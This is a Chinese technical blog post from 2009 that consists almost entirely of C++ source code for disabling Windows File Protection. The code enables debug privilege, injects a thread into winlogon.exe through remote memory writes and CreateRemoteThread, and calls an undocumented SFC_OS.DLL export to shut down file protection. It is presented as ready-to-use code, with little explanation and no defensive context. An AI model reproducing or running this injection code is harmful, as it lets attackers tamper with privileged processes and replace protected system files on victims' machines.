Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1804356
  • 博文数量: 290
  • 博客积分: 10653
  • 博客等级: 上将
  • 技术积分: 3178
  • 用 户 组: 普通用户
  • 注册时间: 2007-10-24 23:08
文章存档

2013年(6)

2012年(15)

2011年(25)

2010年(86)

2009年(52)

2008年(66)

2007年(40)

分类: C/C++

2009-07-06 17:37:19


#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Shlwapi.h>
#include <sfc.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <tlhelp32.h>
#pragma comment(lib,"sfc.lib")
#pragma comment(lib,"shlwapi.lib")


#pragma check_stack (off)
DWORD thread_func (FARPROC sfc_terminate)
{
sfc_terminate();
return 0;
}
void after_thread_func(void)
{
}
#pragma check_stack

//调整权限

int AdjustPrivileges(void)
{
HANDLE token_handle;
int ret=0;

if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token_handle))
{
LUID luid;
if(LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
TOKEN_PRIVILEGES tk_priv;

tk_priv.PrivilegeCount=1;
tk_priv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tk_priv.Privileges[0].Luid=luid;

if(AdjustTokenPrivileges(token_handle,FALSE,&tk_priv,0,NULL,NULL)) ret=1;
}
CloseHandle(token_handle);
}
return ret;
}

//根据取得进程号

DWORD GetProcessID(const char* pname)
{
HANDLE hProcessSnap = NULL;
DWORD bRet = 0;
PROCESSENTRY32 pe32 = {0};

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);

pe32.dwSize = sizeof(PROCESSENTRY32);

if (Process32First(hProcessSnap, &pe32))
{

do
{
if (stricmp(pe32.szExeFile, pname) == 0) {
bRet = pe32.th32ProcessID;
break;
}
}while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
return (bRet);
}

//关闭windows文件保护

void TerminateSfc()
{
DWORD wpid = 0;
wpid = GetProcessID("winlogon.exe");
HANDLE remote_thread;
HMODULE sfc=LoadLibrary("SFC_OS.DLL");

FARPROC sfc_terminate=GetProcAddress(sfc, (char *) 2);

if (!AdjustPrivileges()) {
MessageBox(NULL, "调整权限错误", "", MB_OK);
exit(0);
}

HANDLE process=OpenProcess(PROCESS_ALL_ACCESS, FALSE, wpid);
if(!process)
{
exit(0);
}

LPVOID remote_mem=VirtualAllocEx(process,NULL,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),MEM_COMMIT,PAGE_READWRITE);
if(!remote_mem)
{
printf("Error while commiting memory in the remote process\n");
goto clean_up;
}

if(!WriteProcessMemory(process,remote_mem,(char *) thread_func,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),(SIZE_T *) 0))
{
printf("Error %d while writing to the remote process\n", GetLastError());
goto clean_up;
}

remote_thread=CreateRemoteThread(process,NULL,0,(LPTHREAD_START_ROUTINE) remote_mem,(LPVOID) sfc_terminate,0,NULL);
if(!remote_thread)
{
printf("Error while creating remote thread in the process\n");
goto clean_up;
}

if(WaitForSingleObject(remote_thread, 10*1000)==WAIT_TIMEOUT)
printf("Timeout occured while waiting for the remote thread\n");

CloseHandle(remote_thread);

clean_up:
if(remote_mem) VirtualFreeEx(process, remote_mem, 0, MEM_RELEASE);
CloseHandle(process);
}

阅读(1270) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~